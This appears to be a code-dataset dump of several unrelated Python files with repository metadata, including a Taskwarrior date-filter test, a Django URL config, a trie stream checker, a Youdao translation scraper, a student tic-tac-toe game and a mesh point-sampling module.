|
c4c0bd1e81926ba3b08e72cc170987370ae53fb3
|
[
"MIT"
] |
permissive
|
bjornreppen/task
|
6d96f578eec7b9cceeb4d728caeda87e7a446949
|
a9eac8bb715ac8f51073c080ac439bf5c09493e8
|
refs/heads/master
| 2021-05-30T07:48:39.263967
| 2015-10-21T20:50:42
| 2015-10-21T20:50:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,539
|
t
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright 2006 - 2015, Paul Beckingham, Federico Hernandez.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# http://www.opensource.org/licenses/mit-license.php
#
###############################################################################
import sys
import os
import unittest
# Ensure python finds the local simpletap module
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from basetest import Task, TestCase
class TestBug1630(TestCase):
def setUp(self):
"""Executed before each test in the class"""
self.t = Task()
self.t("add zero")
self.t("add one due:7d")
self.t("add two due:10d")
def test_attribute_modifier_with_duration(self):
"""Verify that 'due.before:9d' is correctly interpreted"""
code, out, err = self.t("due.before:9d list rc.verbose:nothing")
self.assertNotIn("zero", out)
self.assertIn("one", out)
self.assertNotIn("two", out)
def test_attribute_no_modifier_with_duration(self):
"""Verify that 'due:7d' is correctly interpreted"""
code, out, err = self.t("due:7d list rc.verbose:nothing")
self.assertNotIn("zero", out)
self.assertIn("one", out)
self.assertNotIn("two", out)
if __name__ == "__main__":
from simpletap import TAPTestRunner
unittest.main(testRunner=TAPTestRunner())
# vim: ai sts=4 et sw=4 ft=python
|
[
"paul@beckingham.net"
] |
paul@beckingham.net
|
3a51822baafc23044111a837cfa2333102d2ba8b
|
a869f208770692f65c265563a11333d6577b1d94
|
/callback_python.py
|
6a4dbd97f0cd0194b3e8584e457ad764ef6c765d
|
[] |
no_license
|
malep2007/python-scripts
|
8ea1c7fb78b5111348f5c4f54e084612f82647e4
|
e57c01f79447be3dcf193a427db6bbabe4a06665
|
refs/heads/master
| 2020-08-03T14:53:57.424520
| 2019-09-29T12:16:01
| 2019-09-29T12:16:01
| 211,792,498
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 297
|
py
|
def copy_and_manipulate(array, callback):
output = []
for i in array:
output.append(callback(i))
return output
def add_one(num):
num+=1 # freaking weird that python needs to evaluate this before it is returned
return num
print(copy_and_manipulate([1,2,3], add_one))
|
[
"ephraim.malinga@gmail.com"
] |
ephraim.malinga@gmail.com
|
65ed4e161dfa15a766e3541d97ca7beeebb6d745
|
1d9595555d45c9f31edc164275c392f9d4fc001a
|
/xmlutils/renderer/base.py
|
39d84cc6c8f5ddd5e1bce3a6a9d138dc13bd919a
|
[
"BSD-2-Clause"
] |
permissive
|
tokibito/python-xmlutils
|
9a0f364df3c32b15d4ae58e3ccf07fb3c9e004e0
|
f173b8ef01fb740d097d1875f205f714982b5829
|
refs/heads/master
| 2020-07-25T07:52:37.899389
| 2010-03-30T11:55:52
| 2010-03-30T11:55:52
| 208,221,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 145
|
py
|
class BaseRenderer(object):
def __init__(self, *args, **kwargs):
pass
def render(self, node):
raise NotImplementedError
|
[
"xxshss@yahoo.co.jp"
] |
xxshss@yahoo.co.jp
|
552877857c701781809eee505c222d299fae243a
|
3b9bf497cd29cea9c24462e0411fa8adbfa6ba60
|
/leetcode/Problems/1032--Stream-of-Characters-Hard.py
|
9ce827464f36efa080a24e21215caae9b4642bae
|
[] |
no_license
|
niteesh2268/coding-prepation
|
918823cb7f4965bec096ec476c639a06a9dd9692
|
19be0766f6b9c298fb32754f66416f79567843c1
|
refs/heads/master
| 2023-01-02T05:30:59.662890
| 2020-10-17T13:12:34
| 2020-10-17T13:12:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,023
|
py
|
class TrieNode:
def __init__(self):
self.children = defaultdict()
self.isWordEnd = False
class StreamChecker:
def __init__(self, words: List[str]):
self.root = TrieNode()
self.maxLen = 0
for word in words:
self.maxLen = max(self.maxLen ,len(word))
self.insert(word[::-1])
self.q = ''
def insert(self, word):
temp = self.root
for ch in word:
if ch not in temp.children:
temp.children[ch] = TrieNode()
temp = temp.children[ch]
temp.isWordEnd = True
def query(self, letter: str) -> bool:
self.q = (letter + self.q)[:self.maxLen]
temp = self.root
for ch in self.q:
if not temp:
return False
if ch not in temp.children:
return False
if temp.children[ch] and temp.children[ch].isWordEnd:
return True
temp = temp.children[ch]
|
[
"akualajayaprakash@gmailcom"
] |
akualajayaprakash@gmailcom
|
a883655d8a3bb0994ede721e1eb19c5f49814972
|
17856275ae788e15d3b089dd2f9f291488a0af78
|
/modules/post_details.py
|
30721d6d9358938a23693f952d8171cc9c022371
|
[] |
no_license
|
Bawya1098/OfficeCafe-Projects
|
71a603cb1e307b039ed414ebc8421e25d46811f6
|
346be83bcdee9e410e4ba6980bed49b24f70ca2c
|
refs/heads/master
| 2020-04-22T03:17:33.667193
| 2019-03-11T06:40:31
| 2019-03-11T06:40:31
| 170,081,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
def post_data(connection, user_data):
cursor = connection.cursor()
cursor.execute("""insert into orders(employee_id,cart_items) values(%s,%s);""",
(user_data['employee_id'], user_data['cart_items']))
connection.commit()
cursor.close()
|
[
"admin@Intern3-MacBook-Pro.local"
] |
admin@Intern3-MacBook-Pro.local
|
c6ddb80fc7ad55e16f7e31c3afd45024cca8d9a0
|
ea9e9756f6b5b7022015049d92c399ee03cfde67
|
/知吾煮/AutoTest_DL/interface/test_upload.py
|
e094f84e214ffe6d284efa82d6cc51de6ce3045b
|
[] |
no_license
|
Godlovesli/jiaojiewendang
|
724e0f01028cc5cbcc9ce5807bd057e15172eb91
|
579551eabfc83226804ccfbf8b868192614d7166
|
refs/heads/master
| 2020-04-05T03:38:41.212627
| 2018-11-07T09:31:51
| 2018-11-07T09:31:51
| 156,521,937
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,890
|
py
|
#!/usr/bin/env python
#_*_ coding:utf-8 _*_
# -*- __author__ = 'feng' -*-
from base.base import MyTest
from base.login import Login
import unittest
import json
from HTMLTestRunner import HTMLTestRunner
import urllib, urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
from cryptutil import generateNonce, generateSignature,getSessionSecurity,encryptAES,decryptAES,md5
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
class uploadTest(MyTest):
'''上传图片'''
url_path = '/file/upload'
@classmethod
def setUpClass(cls):
pass
def test_upload_success(self):
'''上传图片成功'''
r = self.publish('POST',
self.url_path,
{'filename': open(r'D:\test.jpg', 'rb')},
)
print r
js = json.loads(r)
self.assertEqual(js['state'], 1)
self.assertEqual(js['message'], u'上传成功')
def test_upload_null(self):
'''必填参数的值为空'''
r = self.publish('POST',
self.url_path,
{'filename': ''},
)
print r
js = json.loads(r)
self.assertEqual(js['state'],-4)
self.assertIn("'filename' is not present",js['message'])
def test_upload_panull(self):
'''必填参数为空'''
r = self.publish('POST',
self.url_path,
{'': open(r'D:\test.jpg', 'rb')},
)
print r
js = json.loads(r)
self.assertEqual(js['state'], -4)
self.assertIn("'filename' is not present", js['message'])
def test_upload_signerror(self):
'''sign不正确'''
self.url = self.base_url + self.url_path
self.signature = generateSignature(self.nonce, "POST", self.url)
register_openers()
data, headers = multipart_encode({'filename': open(r'D:\test.jpg', 'rb')})
request = urllib2.Request(self.url, data=data, headers=headers)
request.add_header('nonce', self.nonce)
request.add_header('signature', self.signature+'e')
request.add_header('User-Agent', 'chunmiapp')
response = urllib2.urlopen(request)
result = response.read()
print result
js = json.loads(result)
self.assertEqual(js['state'],-2)
self.assertIn('拦截请求授权出错',js['message'])
def test_upload_noncerror(self):
'''nonce不正确'''
self.url = self.base_url + self.url_path
self.signature = generateSignature(self.nonce, "POST", self.url)
register_openers()
data, headers = multipart_encode({'filename': open(r'D:\test.jpg', 'rb')})
request = urllib2.Request(self.url, data=data, headers=headers)
request.add_header('nonce', self.nonce+'e')
request.add_header('signature', self.signature)
request.add_header('User-Agent', 'chunmiapp')
response = urllib2.urlopen(request)
result = response.read()
print result
js = json.loads(result)
self.assertEqual(js['state'],-2)
self.assertIn('拦截请求授权出错',js['message'])
if __name__ == '__main__':
# unittest.main()
testunit = unittest.TestSuite()
testunit.addTest(uploadTest('test_upload_success'))
testunit.addTest(uploadTest('test_upload_null'))
testunit.addTest(uploadTest('test_upload_panull'))
testunit.addTest(uploadTest('test_upload_signerror'))
testunit.addTest(uploadTest('test_upload_noncerror'))
fp = open('./upload.html', 'wb')
runner = HTMLTestRunner(stream=fp,
title=u'上传图片接口测试报告',
description=u'用例执行情况:')
runner.run(testunit)
fp.close()
|
[
"1107095622@qq.com"
] |
1107095622@qq.com
|
9fef8d5dc64926520d73300c46c095a61f502d6b
|
9045393c9ace1cfb50b4c03efaafcf815ccce472
|
/tests/test_flow.py
|
5ea479c7f7be45454b6d21e1c7f9b4ed9adb4aaf
|
[
"MIT"
] |
permissive
|
pombredanne/single_file_module-project
|
554aa3aaa63e32eb1c5473085b968b1160eef9ec
|
243f4c9cd9e6ef04ec7e8a48a0fed9645d6933b2
|
refs/heads/master
| 2021-01-23T06:06:07.098548
| 2017-07-14T21:53:35
| 2017-07-14T21:53:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 661
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import pytest
from sfm import flow
def bet_and_win(lower=1, upper=100, threshold=50):
value = random.randint(lower, upper)
if value > threshold:
return value
else:
raise Exception("%s point, You Lose!" % value)
def test_try_ntime():
# Successful case
value = flow.try_ntime(10000, bet_and_win, 1, 10, 5)
assert value > 5
# Unsuccessful case
with pytest.raises(Exception):
value = flow.try_ntime(1, bet_and_win, 1, 10000, 9999)
if __name__ == "__main__":
import os
pytest.main([os.path.basename(__file__), "--tb=native", "-s", ])
|
[
"husanhe@gmail.com"
] |
husanhe@gmail.com
|
e3863a265db5c7c39dd3f86727766c78fc33f2b4
|
d498d66fbe9bae2f86161f5c157d52c9433c6a8c
|
/mysite/mysite/urls.py
|
a577c6e46d6f5fde2d75a5260689f6c54dccb1ee
|
[] |
no_license
|
sulembutproton/promosys
|
9330176d175f29d1e86991d93570981f6cad8317
|
2f67f08e2f07ab9ae0f25d9ac67905ebb1bbbda2
|
refs/heads/master
| 2023-03-11T20:31:06.152814
| 2021-03-01T15:52:31
| 2021-03-01T15:52:31
| 343,463,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,291
|
py
|
"""
samples URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
import os
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.views.static import serve
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
urlpatterns = [
path('admin/', admin.site.urls), # Keep
path('', include('ads.urls')), # Change to ads.urls
path('accounts/', include('django.contrib.auth.urls')), # Keep
url(r'^oauth/', include('social_django.urls', namespace='social')), # Keep
]
"""
# Sample applications
path('hello/', include('hello.urls')),
path('users/', include('users.urls')),
path('tracks/', include('tracks.urls')),
path('views/', include('views.urls')),
path('route/', include('route.urls', namespace='nsroute')),
path('tmpl/', include('tmpl.urls')),
path('gview/', include('gview.urls')),
path('session/', include('session.urls')),
path('authz/', include('authz.urls')),
path('getpost/', include('getpost.urls')),
path('form/', include('form.urls')),
path('crispy/', include('crispy.urls')),
path('myarts/', include('myarts.urls')),
path('menu/', include('menu.urls')),
path('forums/', include('forums.urls')),
path('pics/', include('pics.urls')),
path('favs/', include('favs.urls')),
path('favsql/', include('favsql.urls')),
path('rest/', include('rest.urls')),
path('autos/', include('autos.urls')),
path('usermodel/', include('usermodel.urls')),
path('chat/', include('chat.urls')),
path('util/', include('util.urls')),
path('well/', include('well.urls')),
path('tagme/', include('tagme.urls')),
"""
# Serve the static HTML
"""
urlpatterns += [
url(r'^site/(?P<path>.*)$', serve,
{'document_root': os.path.join(BASE_DIR, 'site'),
'show_indexes': True},
name='site_path'
),
]
"""
# Serve the favicon - Keep for later
urlpatterns += [
path('favicon.ico', serve, {
'path': 'favicon.ico',
'document_root': os.path.join(BASE_DIR, 'ads/static'),
}
),
]
# Switch to social login if it is configured - Keep for later
try:
from . import github_settings
social_login = 'registration/login_social.html'
urlpatterns.insert(0,
path('accounts/login/', auth_views.LoginView.as_view(template_name=social_login))
)
print('Using', social_login, 'as the login template')
except:
print('Using registration/login.html as the login template')
# References
# https://docs.djangoproject.com/en/3.0/ref/urls/#include
|
[
"sulembut@protonmail.com"
] |
sulembut@protonmail.com
|
5b3c899903378bc31aeee6e2a698d7b316d2b9ed
|
a1352de184b2a60295b90ba5472579c6dc8abb29
|
/misc/python/strucdump.py
|
a7ea13d9294eccf04d1da1d6211a77fe61beb026
|
[] |
no_license
|
gunmetalbackupgooglecode/corkami
|
2b5e99b1cfd94f716e35293e915d536e468aec75
|
1a52e71ec205f1cb7ce493789474209dd1b47911
|
refs/heads/master
| 2016-09-16T06:33:52.261541
| 2015-02-11T18:41:13
| 2015-02-11T18:41:13
| 32,167,637
| 25
| 11
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,465
|
py
|
#simple hex structure viewer
#TODO: classify!
# Ange Albertini, BSD Licence, 2011
import struct
import sys
fn = sys.argv[1]
last = -1
lastdata = []
lastrend = -1
INDENT = "\t"
COLS = 2
tags_types = [
('BOGUSTYPE', 50829),
]
TAGS = dict([(i[1], i[0]) for i in tags_types] + tags_types)
for i,j in TAGS.iteritems():
TAGS[j] = i
def ph(start, end, cmt=None, skip=None, ccb=None):
global r, last, lastrend, INDENT
if end > len(r):
end = len(r)
if cmt is None:
cmt = ""
if ccb is not None:
cmt = parseformat(r[start:end], ccb) + " " + cmt
cmt = cmt.splitlines()
rstart = (start / (16*COLS)) * (16*COLS)
rend = (end / (16*COLS) * (16*COLS)) + (10 if (end % 0x10 > 0) else 0)
heads = range(rstart, rend, (16*COLS))
if skip is None:
skip = len(heads)
elif skip == -1:
skip = 1
non_skipped = True
for line, head in enumerate(heads):
if line > skip and line < len(heads) - skip:
if non_skipped:
print INDENT + "[..]"
non_skipped = False
continue
if head==lastrend and line == 0:
print INDENT + " ",
else:
print INDENT + "%03x:" % head,
for i in range((16*COLS)):
if (head + i < start) or (head + i > end - 1):
print " ",
else:
print "%02x" % ord(r[head + i]),
print("// " + cmt[line] if line < len(cmt) else "")
last = end
lastdata = r[start:end]
lastrend = heads[-1]
fcuts = []
with open(fn, "rb") as f:
r = f.read()
def tag_cb(d):
return "0x%02x (%s)" % (d, TAGS[d])
def small_hex(d):
if 0 <= d < 10:
return "%i" % d
else:
return "0x%X" % d
def types(d):
return "%s (%s)" % (small_hex(d), {1:"Byte", 2:"Ascii", 3:"Short", 4:"Long", 5:"Rational"}[d])
def dec(d):
return "%i" % d
STRUCTURE = [["H,Tag", tag_cb], ["H,Type", types], ["I,Count", small_hex], ["I,ValOffset", small_hex]]
def parseformat(d,f):
s = []
for f in f:
type_, name = f[0].split(",")
size = struct.calcsize(type_)
val = struct.unpack(type_, d[:size])[0]
d = d[size:]
if len(f) == 1:
s.append("%s:0x%x" % (name, val))
else:
s.append("%s:%s" % (name, f[1](val)))
return ", ".join(s)
|
[
"ange.albertini@gmail.com"
] |
ange.albertini@gmail.com
|
2aa508143b15c41cf17a324f991bc0fe83031d58
|
5c2e4266abf6d2be9102d5309bf94071a1eae1db
|
/02 高级语法系列/cp 爬虫/基础/v18.py
|
478a6d18945b1ac16874c9eb6b549f405533e545
|
[] |
no_license
|
13834319675/python
|
8176d5da47136b9b3ec290eaa0b699c6b1e7a8ab
|
3e6f04670f6f01006f827794865488dd40bca380
|
refs/heads/master
| 2021-07-11T18:29:12.894401
| 2021-07-05T08:29:27
| 2021-07-05T08:29:27
| 171,112,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,756
|
py
|
'''
破解有道词典
V1
'''
from urllib import request, parse
def youdao():
k = input("请输入要翻译的内容:")
url = "http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule"
data = {
"i": k,
"from":"AUTO",
"to": "AUTO",
"smartresult": "dict",
"client": "fanyideskweb",
"salt": "1523100789519",
"sign": "b8a55a436686cd89873fa46514ccedbe",
"doctype": "json",
"version": "2.1",
"keyfrom": "fanyi.web",
"action":"FY_BY_REALTIME",
"typoResult": "false"
}
# 参数data需要是bytes格式
data = parse.urlencode(data).encode()
headers = {
"Accept": "application/json,text/javascript,*/*;q=0.01",
#"Accept-Encoding": "gzip,deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "keep-alive",
"Content-Length": "200",
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"Cookie": "OUTFOX_SEARCH_USER_ID=-1548144101@10.168.8.76;JSESSIONID=aaaTLWzfvp5Hfg9mAhFkw;OUTFOX_SEARCH_USER_ID_NCOO=1999296830.4784973;___rl__test__cookies=1523100789517",
"Host": "fanyi.youdao.com",
"Origin": "http://fanyi.youdao.com",
"Referer": "http://fanyi.youdao.com/",
"User-Agent": "Mozilla/5.0( X11; Linux x86_64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 X-Requested-With: XMLHttpRequest"
}
req = request.Request(url=url, data=data, headers=headers)
rsp = request.urlopen(req)
html = rsp.read().decode()
print(html)
if __name__ == '__main__':
youdao()
|
[
"1134876981@qq.com"
] |
1134876981@qq.com
|
62750b17337dd5468a944195eea64784f470b4ac
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/303/usersdata/284/92253/submittedfiles/testes.py
|
e388e395e0c9c5be69b317d970dd592eb7e72f48
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,020
|
py
|
linha = []
coluna = []
for linha in range (0,3,1):
for coluna in range (0,3,1):
print('%d %d' %(linha,coluna))
import random
def solicitaSimboloDoHumano():
letra = 0
while not (letra == 'O' or letra == 'X'):
print('Qual símbolo você deseja utilizar no jogo? ')
letra = input().upper()
if letra == 'X':
return ['X','O']
else:
return ['O','X']
def sorteioPrimeiraJogada():
if random.randint(1,2) == 1:
return 'Computador'
else:
return 'Jogador'
def jogadaHumana(tabuleiro):
movimento = 0
while movimento not in ( [0 0],[1 1],[2 2],[0 1],[0 2],[1 0],[1 2],[2 0],[2 1] ) .split() or not vazio(tabuleiro, int(movimento)):
print('Qual a sua jogada, []?'.format(nome))
movimento = input()
return int(movimento)
def jogadaComputador(tabuleiro, letraComputador):
if letraComputador == 'X':
letraJogador = 'O'
else:
letraJogador = 'X'
for i in range(1, 10):
copy = mostraTabuleiro(tabuleiro)
if vazio(copy, i):
movimentacao(copy, letraComputador, i)
if verificaVencedor(copy, letraComputador):
return i
for i in range(1, 10):
copy = mostraTabuleiro(tabuleiro)
if vazio(copy, i):
movimentacao(copy, letraJogador, i)
if verificaVencedor(copy, letraJogador):
return i
movimento = movAleatoria(tabuleiro, [1, 3, 7, 9])
if movimento != None:
return movimento
if vazio(tabuleiro, 5):
return 5
return movAleatoria(tabuleiro, [2, 4, 6, 8])
#def validaJogada()
def mostraTabuleiro(tabuleiro):
dupeTabuleiro = []
for i in tabuleiro:
dupeTabuleiro.append(i)
return dupeTabuleiro
def verificaVencedor(tabuleiro, letra):
return ((tabuleiro[7] == letra and tabuleiro[8] == letra and tabuleiro[9] == letra) or
(tabuleiro[4] == letra and tabuleiro[5] == letra and tabuleiro[6] == letra) or
(tabuleiro[1] == letra and tabuleiro[2] == letra and tabuleiro[3] == letra) or
(tabuleiro[7] == letra and tabuleiro[4] == letra and tabuleiro[1] == letra) or
(tabuleiro[8] == letra and tabuleiro[5] == letra and tabuleiro[2] == letra) or
(tabuleiro[9] == letra and tabuleiro[6] == letra and tabuleiro[3] == letra) or
(tabuleiro[7] == letra and tabuleiro[5] == letra and tabuleiro[3] == letra) or
(tabuleiro[9] == letra and tabuleiro[5] == letra and tabuleiro[1] == letra))
#################################################################################
def vazio(tabuleiro, movimento):
return tabuleiro[movimento] == ' '
def desenhaTabuleiro(tabuleiro):
print(' ' + tabuleiro[7] + ' | ' + tabuleiro[8] + ' | ' + tabuleiro[9])
print(' ' + tabuleiro[4] + ' | ' + tabuleiro[5] + ' | ' + tabuleiro[6])
print(' ' + tabuleiro[1] + ' | ' + tabuleiro[2] + ' | ' + tabuleiro[3])
def jogarNovamente():
print('Você deseja jogar novamente? ')
return input().lower().startswith('sim')
def movimentacao(tabuleiro, letra, movimento):
tabuleiro[movimento] = letra
def movAleatoria(tabuleiro, movimentosList):
movPossiveis = []
for i in movimentosList:
if vazio(tabuleiro, i):
movPossiveis.append(i)
if len(movPossiveis) != 0:
return random.choice(movPossiveis)
else:
return None
def completo(tabuleiro):
for i in range(1, 10):
if vazio(tabuleiro, i):
return False
return True
print('Bem vindo ao JogoDaVelha do grupo X')
nome = input('Qual o seu nome (ou apelido)? ')
while True:
tabul = [' '] * 10
letraJogador, letraComputador = solicitaSimboloDoHumano()
turn = sorteioPrimeiraJogada()
print('Vencedor do sorteio para início do jogo: {}'.format(turn))
rodando = True
while rodando:
if turn == 'Jogador':
desenhaTabuleiro(tabul)
movimento = jogadaHumana(tabul)
movimentacao(tabul, letraJogador, movimento)
if verificaVencedor(tabul, letraJogador):
desenhaTabuleiro(tabul)
print('Vencedor: {}'.format(nome))
rodando = False
else:
if completo(tabul):
desenhaTabuleiro(tabul)
print('Deu Velha!')
break
else:
turn = 'Computador'
else:
movimento = jogadaComputador(tabul, letraComputador)
movimentacao(tabul, letraComputador, movimento)
if verificaVencedor(tabul, letraComputador):
desenhaTabuleiro(tabul)
print('Vencedor: Computador')
rodando = False
else:
if completo(tabul):
desenhaTabuleiro(tabul)
print('Deu Velha!')
break
else:
turn = 'Jogador'
if not jogarNovamente():
break
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
1f52fc7b98a2980e9da9429774fccee2b8e054d2
|
ba8d566fe1fca8584601d70e209fef358d5aea16
|
/pyntcloud/sampling/s_mesh.py
|
5eb979a4acd73d38bf46e280431bc1d48fbb5e2b
|
[] |
no_license
|
threerivers3d-jc/pyntcloud
|
6d316954fdedbd0d336e51ca0c887913f077c6cb
|
81311d4cbca037a755353dc5fcf80acad9189513
|
refs/heads/master
| 2021-01-21T15:26:53.939132
| 2017-06-21T17:41:48
| 2017-06-21T17:41:48
| 91,844,119
| 0
| 0
| null | 2017-05-19T20:46:30
| 2017-05-19T20:46:30
| null |
UTF-8
|
Python
| false
| false
| 3,658
|
py
|
import numpy as np
import pandas as pd
from ..base import Sampling
from ..geometry.areas import triangle_area_multi
class Sampling_Mesh(Sampling):
"""
"""
def __init__(self, pyntcloud, rgb=False, normals=False):
super().__init__(pyntcloud)
self.rgb = rgb
self.normals = normals
def extract_info(self):
v1, v2, v3 = self.pyntcloud.get_mesh_vertices(rgb=self.rgb, normals=self.normals)
self.v1_xyz = v1[:, :3]
self.v2_xyz = v2[:, :3]
self.v3_xyz = v3[:, :3]
if self.rgb:
self.v1_rgb = v1[:, 3:6]
self.v2_rgb = v2[:, 3:6]
self.v3_rgb = v3[:, 3:6]
if self.normals:
self.v1_normals = v1[:, 6:]
self.v2_normals = v2[:, 6:]
self.v3_normals = v3[:, 6:]
elif self.normals:
self.v1_normals = v1[:, 3:6]
self.v2_normals = v2[:, 3:6]
self.v3_normals = v3[:, 3:6]
class RandomMesh(Sampling_Mesh):
""" Sample points adjusting probabilities according to triangle area.
Parameters
----------
n: int
Number of points to be sampled.
rgb: bool, optional
Default: False
Indicates if rgb values will be also sampled.
normals: bool, optional
Default: False
Indicates if normals will be also sampled.
"""
def __init__(self, pyntcloud, n, rgb=False, normals=False):
super().__init__(pyntcloud, rgb, normals)
self.n = n
def compute(self):
areas = triangle_area_multi(self.v1_xyz, self.v2_xyz, self.v3_xyz)
probabilities = areas / np.sum(areas)
random_idx = np.random.choice(np.arange(len(areas)), size=self.n, p=probabilities)
v1_xyz = self.v1_xyz[random_idx]
v2_xyz = self.v2_xyz[random_idx]
v3_xyz = self.v3_xyz[random_idx]
# (n, 1) the 1 is for broadcasting
u = np.random.rand(self.n, 1)
v = np.random.rand(self.n, 1)
is_a_problem = u + v > 1
u[is_a_problem] = 1 - u[is_a_problem]
v[is_a_problem] = 1 - v[is_a_problem]
result = pd.DataFrame()
result_xyz = (v1_xyz * u) + (v2_xyz * v) + ((1 - (u + v)) * v3_xyz)
result_xyz = result_xyz.astype(np.float32)
result["x"] = result_xyz[:,0]
result["y"] = result_xyz[:,1]
result["z"] = result_xyz[:,2]
if self.rgb:
v1_rgb = self.v1_rgb[random_idx]
v2_rgb = self.v2_rgb[random_idx]
v3_rgb = self.v3_rgb[random_idx]
result_rgb = (v1_rgb * u) + (v2_rgb * v) + ((1 - (u + v)) * v3_rgb)
result_rgb = result_rgb.astype(np.uint8)
result["red"] = result_rgb[:,0]
result["green"] = result_rgb[:,1]
result["blue"] = result_rgb[:,2]
if self.normals:
v1_normals = self.v1_normals[random_idx]
v2_normals = self.v2_normals[random_idx]
v3_normals = self.v3_normals[random_idx]
sum_normals = v1_normals + v2_normals + v3_normals
result_normals = sum_normals / np.linalg.norm(sum_normals, axis=1)[..., None]
result_normals = result_normals.astype(np.float32)
result["nx"] = result_normals[:,0]
result["ny"] = result_normals[:,1]
result["nz"] = result_normals[:,2]
return result
|
[
"daviddelaiglesiacastro@gmail.com"
] |
daviddelaiglesiacastro@gmail.com
|
f10d28f05fae8ab19c89469f1599948f39a0b6c6
|
9fbab0fd689ba1abbae4439a0e5bda315932f177
|
/tools/effectiveT3/effectiveT3.py
|
0254f325166f39f946564fa379f1c4f90dbfa794
|
[
"MIT"
] |
permissive
|
Imoteph/pico_galaxy
|
437cb5c9b231896fcfcafec902a0ed1f1c9646b3
|
2c81bd9f238aacf7fb2ac2b027706eff31d23cc5
|
refs/heads/master
| 2021-01-11T23:00:08.239492
| 2016-11-04T12:06:36
| 2016-11-04T12:06:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,603
|
py
|
#!/usr/bin/env python
"""Wrapper for EffectiveT3 v1.0.1 for use in Galaxy.
This script takes exactly five command line arguments:
* model name (e.g. TTSS_STD-1.0.1.jar)
* threshold (selective or sensitive)
* an input protein FASTA filename
* output tabular filename
It then calls the standalone Effective T3 v1.0.1 program (not the
webservice), and reformats the semi-colon separated output into
tab separated output for use in Galaxy.
"""
import sys
import os
import subprocess
# The Galaxy auto-install via tool_dependencies.xml will set this environment variable
effective_t3_dir = os.environ.get("EFFECTIVET3", "/opt/EffectiveT3/")
effective_t3_jar = os.path.join(effective_t3_dir, "TTSS_GUI-1.0.1.jar")
if "-v" in sys.argv or "--version" in sys.argv:
# TODO - Get version of the JAR file dynamically?
print("Wrapper v0.0.16, TTSS_GUI-1.0.1.jar")
sys.exit(0)
if len(sys.argv) != 5:
sys.exit("Require four arguments: model, threshold, input protein FASTA file & output tabular file")
model, threshold, fasta_file, tabular_file = sys.argv[1:]
if not os.path.isfile(fasta_file):
sys.exit("Input FASTA file not found: %s" % fasta_file)
if threshold not in ["selective", "sensitive"] \
and not threshold.startswith("cutoff="):
sys.exit("Threshold should be selective, sensitive, or cutoff=..., not %r" % threshold)
def clean_tabular(raw_handle, out_handle):
"""Clean up Effective T3 output to make it tabular."""
count = 0
positive = 0
errors = 0
for line in raw_handle:
if not line or line.startswith("#") \
or line.startswith("Id; Description; Score;"):
continue
assert line.count(";") >= 3, repr(line)
# Normally there will just be three semi-colons, however the
# original FASTA file's ID or description might have had
# semi-colons in it as well, hence the following hackery:
try:
id_descr, score, effective = line.rstrip("\r\n").rsplit(";", 2)
# Cope when there was no FASTA description
if "; " not in id_descr and id_descr.endswith(";"):
id = id_descr[:-1]
descr = ""
else:
id, descr = id_descr.split("; ", 1)
except ValueError:
sys.exit("Problem parsing line:\n%s\n" % line)
